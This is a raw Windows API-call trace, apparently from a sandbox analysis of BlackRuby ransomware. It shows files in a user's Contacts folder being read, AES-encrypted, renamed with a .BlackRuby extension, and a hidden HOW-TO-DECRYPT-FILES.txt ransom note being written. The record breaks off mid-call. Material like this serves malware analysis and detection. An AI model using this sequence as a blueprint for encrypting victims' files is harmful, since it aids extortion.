[0055.183] SetErrorMode (uMode=0x1) returned 0x0 [0055.183] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360da0 [0055.183] GetLastError () returned 0x12 [0055.183] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.183] GetLastError () returned 0x12 [0055.183] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.183] GetLastError () returned 0x12 [0055.184] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.184] GetLastError () returned 0x12 [0055.184] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.184] GetLastError () returned 0x12 [0055.184] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.184] GetLastError () returned 0x12 [0055.184] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.184] GetLastError () returned 0x12 [0055.184] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.184] GetLastError () returned 0x12 [0055.184] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.184] GetLastError () returned 0x12 [0055.184] FindNextFileW (in: hFindFile=0x360da0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.184] GetLastError () returned 0x12 [0055.185] FindClose (in: hFindFile=0x360da0 | out: hFindFile=0x360da0) returned 1 [0055.185] SetErrorMode (uMode=0x0) returned 0x1 [0055.185] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0055.185] GetLastError () returned 0x12 [0055.185] SetErrorMode (uMode=0x1) returned 0x0 [0055.185] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact"), fInfoLevelId=0x0, lpFileInformation=0x1b650ac | out: lpFileInformation=0x1b650ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x1ff8a75a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e)) returned 1 [0055.185] GetLastError () returned 0x12 [0055.185] SetErrorMode (uMode=0x0) returned 0x1 [0055.185] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0055.185] GetLastError () returned 0x12 [0055.185] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0055.185] GetLastError () returned 0x12 [0055.185] SetErrorMode (uMode=0x1) returned 0x0 [0055.185] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.185] GetLastError () returned 0x0 [0055.185] GetFileType (hFile=0x184) returned 0x1 [0055.186] SetErrorMode (uMode=0x0) returned 0x1 [0055.186] GetFileType (hFile=0x184) returned 0x1 [0055.186] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x10b1e [0055.186] GetLastError () returned 0x0 [0055.186] ReadFile (in: hFile=0x184, lpBuffer=0x1b6729c, nNumberOfBytesToRead=0x10b1e, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b6729c*, lpNumberOfBytesRead=0x18ed84*=0x10b1e, lpOverlapped=0x0) returned 1 [0055.194] GetLastError () returned 0x0 [0055.194] CloseHandle (hObject=0x184) returned 1 [0055.194] GetLastError () returned 0x0 [0055.194] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0055.194] GetLastError () returned 0x0 [0055.194] SetErrorMode (uMode=0x1) returned 0x0 [0055.194] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x1ff8a75a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e)) returned 1 [0055.194] GetLastError () returned 0x0 [0055.194] SetErrorMode (uMode=0x0) returned 0x1 [0055.194] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c818) returned 1 [0055.194] GetLastError () returned 0x0 [0055.225] CryptImportKey (in: hProv=0x37c818, pbData=0x1be2ca4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360f60) returned 1 [0055.225] GetLastError () returned 0x0 [0055.225] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.225] GetLastError () returned 0x0 [0055.230] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.230] GetLastError () returned 0x0 [0055.230] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ae0) returned 1 [0055.231] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.231] GetLastError () returned 0x0 [0055.231] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1c0fcf0*=0x1, dwFlags=0x0) returned 1 [0055.231] GetLastError () returned 0x0 [0055.231] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1c0fcbc, dwFlags=0x0) returned 1 [0055.231] GetLastError () returned 0x0 [0055.231] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c0fd38*, pdwDataLen=0x18ed74*=0x10c10, dwBufLen=0x10c10 | out: pbData=0x1c0fd38*, pdwDataLen=0x18ed74*=0x10c10) returned 1 [0055.231] GetLastError () returned 0x0 [0055.231] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c31584*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c31584*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0055.231] GetLastError () returned 0x0 [0055.231] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c315b4*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c315b4*, pdwDataLen=0x18ed94*=0x10) returned 1 [0055.231] GetLastError () returned 0x0 [0055.260] CryptDestroyKey (hKey=0x360f60) returned 1 [0055.260] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0055.260] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0055.260] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0055.260] GetLastError () returned 0x0 [0055.260] SetErrorMode (uMode=0x1) returned 0x0 [0055.260] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.261] GetLastError () returned 0xb7 [0055.261] GetFileType (hFile=0x184) returned 0x1 [0055.261] SetErrorMode (uMode=0x0) returned 0x1 [0055.261] GetFileType (hFile=0x184) returned 0x1 [0055.263] CloseHandle (hObject=0x184) returned 1 [0055.263] GetLastError () returned 0xb7 [0055.263] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0055.263] GetLastError () returned 0xb7 [0055.263] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Encrypted_HeQUkOSttiaIyRPlEke1Dp0O7xxtDvU008kjq8oNHCaQycr.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Encrypted_HeQUkOSttiaIyRPlEke1Dp0O7xxtDvU008kjq8oNHCaQycr.BlackRuby", lpFilePart=0x0) returned 0x5d [0055.263] GetLastError () returned 0xb7 [0055.263] SetErrorMode (uMode=0x1) returned 0x0 [0055.263] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x292277a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x10c20)) returned 1 [0055.263] GetLastError () returned 0xb7 [0055.263] SetErrorMode (uMode=0x0) returned 0x1 [0055.263] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\Encrypted_HeQUkOSttiaIyRPlEke1Dp0O7xxtDvU008kjq8oNHCaQycr.BlackRuby" (normalized: "c:\\users\\eebsym5\\contacts\\encrypted_hequkosttiaiyrpleke1dp0o7xxtdvu008kjq8onhcaqycr.blackruby")) returned 1 [0055.263] GetLastError () returned 0xb7 [0055.264] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0055.264] GetLastError () returned 0xb7 [0055.264] SetErrorMode (uMode=0x1) returned 0x0 [0055.264] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\contacts\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.270] GetLastError () returned 0x0 [0055.270] GetFileType (hFile=0x184) returned 0x1 [0055.270] SetErrorMode (uMode=0x0) returned 0x1 [0055.270] GetFileType (hFile=0x184) returned 0x1 [0055.271] CloseHandle (hObject=0x184) returned 1 [0055.271] GetLastError () returned 0x0 [0055.271] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0055.271] GetLastError () returned 0x0 [0055.271] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0055.271] GetLastError () returned 0x0 [0055.271] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\desktop.ini", lpFilePart=0x0) returned 0x25 [0055.271] GetLastError () returned 0x0 [0055.271] SetErrorMode (uMode=0x1) returned 0x0 [0055.271] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\desktop.ini" (normalized: "c:\\users\\eebsym5\\contacts\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1b718e0 | out: lpFileInformation=0x1b718e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec3e8400, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x19c)) returned 1 [0055.271] GetLastError () returned 0x0 [0055.271] SetErrorMode (uMode=0x0) returned 0x1 [0055.272] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0055.272] GetLastError () returned 0x0 [0055.272] SetErrorMode (uMode=0x1) returned 0x0 [0055.272] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\contacts\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0055.272] GetLastError () returned 0x5 [0055.274] SetErrorMode (uMode=0x0) returned 0x1 [0055.275] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", lpFilePart=0x0) returned 0x30 [0055.275] GetLastError () returned 0x5 [0055.275] SetErrorMode (uMode=0x1) returned 0x0 [0055.275] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact"), fInfoLevelId=0x0, lpFileInformation=0x1b8f5f8 | out: lpFileInformation=0x1b8f5f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a55460, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x56a55460, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x56a55460, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4eb)) returned 1 [0055.275] GetLastError () returned 0x5 [0055.275] SetErrorMode (uMode=0x0) returned 0x1 [0055.275] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", lpFilePart=0x0) returned 0x30 [0055.275] GetLastError () returned 0x5 [0055.276] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", lpFilePart=0x0) returned 0x30 [0055.276] GetLastError () returned 0x5 [0055.276] SetErrorMode (uMode=0x1) returned 0x0 [0055.276] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.276] GetLastError () returned 0x0 [0055.276] GetFileType (hFile=0x184) returned 0x1 [0055.276] SetErrorMode (uMode=0x0) returned 0x1 [0055.276] GetFileType (hFile=0x184) returned 0x1 [0055.276] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x4eb [0055.276] GetLastError () returned 0x0 [0055.276] ReadFile (in: hFile=0x184, lpBuffer=0x1b91810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b91810*, lpNumberOfBytesRead=0x18ed84*=0x4eb, lpOverlapped=0x0) returned 1 [0055.281] GetLastError () returned 0x0 [0055.281] CloseHandle (hObject=0x184) returned 1 [0055.281] GetLastError () returned 0x0 [0055.281] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", lpFilePart=0x0) returned 0x30 [0055.281] GetLastError () returned 0x0 [0055.281] SetErrorMode (uMode=0x1) returned 0x0 [0055.281] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a55460, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x56a55460, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x56a55460, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4eb)) returned 1 [0055.281] GetLastError () returned 0x0 [0055.281] SetErrorMode (uMode=0x0) returned 0x1 [0055.281] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c790) returned 1 [0055.282] GetLastError () returned 0x0 [0055.316] CryptImportKey (in: hProv=0x37c790, pbData=0x1bed0c8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360da0) returned 1 [0055.316] GetLastError () returned 0x0 [0055.316] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.316] GetLastError () returned 0x0 [0055.322] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.322] GetLastError () returned 0x0 [0055.322] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360e20) returned 1 [0055.322] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.322] GetLastError () returned 0x0 [0055.322] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1c1a114*=0x1, dwFlags=0x0) returned 1 [0055.322] GetLastError () returned 0x0 [0055.322] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1c1a0e0, dwFlags=0x0) returned 1 [0055.322] GetLastError () returned 0x0 [0055.322] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c1a15c*, pdwDataLen=0x18ed74*=0x5e0, dwBufLen=0x5e0 | out: pbData=0x1c1a15c*, pdwDataLen=0x18ed74*=0x5e0) returned 1 [0055.322] GetLastError () returned 0x0 [0055.322] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c1ad48*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c1ad48*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0055.322] GetLastError () returned 0x0 [0055.322] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c1ad78*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c1ad78*, pdwDataLen=0x18ed94*=0x10) returned 1 [0055.322] GetLastError () returned 0x0 [0055.322] CryptDestroyKey (hKey=0x360da0) returned 1 [0055.322] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0055.322] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0055.322] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", lpFilePart=0x0) returned 0x30 [0055.322] GetLastError () returned 0x0 [0055.322] SetErrorMode (uMode=0x1) returned 0x0 [0055.322] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.323] GetLastError () returned 0xb7 [0055.323] GetFileType (hFile=0x184) returned 0x1 [0055.323] SetErrorMode (uMode=0x0) returned 0x1 [0055.323] GetFileType (hFile=0x184) returned 0x1 [0055.324] CloseHandle (hObject=0x184) returned 1 [0055.324] GetLastError () returned 0xb7 [0055.324] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", lpFilePart=0x0) returned 0x30 [0055.324] GetLastError () returned 0xb7 [0055.324] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Encrypted_rMUvtVcWYxyusE8HWH4VHizbZmCrvcFxVwpau.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Encrypted_rMUvtVcWYxyusE8HWH4VHizbZmCrvcFxVwpau.BlackRuby", lpFilePart=0x0) returned 0x53 [0055.324] GetLastError () returned 0xb7 [0055.324] SetErrorMode (uMode=0x1) returned 0x0 [0055.324] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a55460, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x56a55460, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x292bfd20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x5f0)) returned 1 [0055.324] GetLastError () returned 0xb7 [0055.324] SetErrorMode (uMode=0x0) returned 0x1 [0055.324] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\Encrypted_rMUvtVcWYxyusE8HWH4VHizbZmCrvcFxVwpau.BlackRuby" (normalized: "c:\\users\\eebsym5\\contacts\\encrypted_rmuvtvcwyxyuse8hwh4vhizbzmcrvcfxvwpau.blackruby")) returned 1 [0055.325] GetLastError () returned 0xb7 [0055.325] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0055.325] GetLastError () returned 0xb7 [0055.325] SetErrorMode (uMode=0x1) returned 0x0 [0055.325] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\contacts\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0055.325] GetLastError () returned 0x5 [0055.326] SetErrorMode (uMode=0x0) returned 0x1 [0055.326] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", lpFilePart=0x0) returned 0x2e [0055.326] GetLastError () returned 0x5 [0055.326] SetErrorMode (uMode=0x1) returned 0x0 [0055.326] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact"), fInfoLevelId=0x0, lpFileInformation=0x1c3a06c | out: lpFileInformation=0x1c3a06c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7abb8cc0, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x7abb8cc0, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x7abb8cc0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4e8)) returned 1 [0055.327] GetLastError () returned 0x5 [0055.327] SetErrorMode (uMode=0x0) returned 0x1 [0055.327] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", lpFilePart=0x0) returned 0x2e [0055.327] GetLastError () returned 0x5 [0055.327] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", lpFilePart=0x0) returned 0x2e [0055.327] GetLastError () returned 0x5 [0055.327] SetErrorMode (uMode=0x1) returned 0x0 [0055.327] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.327] GetLastError () returned 0x0 [0055.327] GetFileType (hFile=0x184) returned 0x1 [0055.327] SetErrorMode (uMode=0x0) returned 0x1 [0055.327] GetFileType (hFile=0x184) 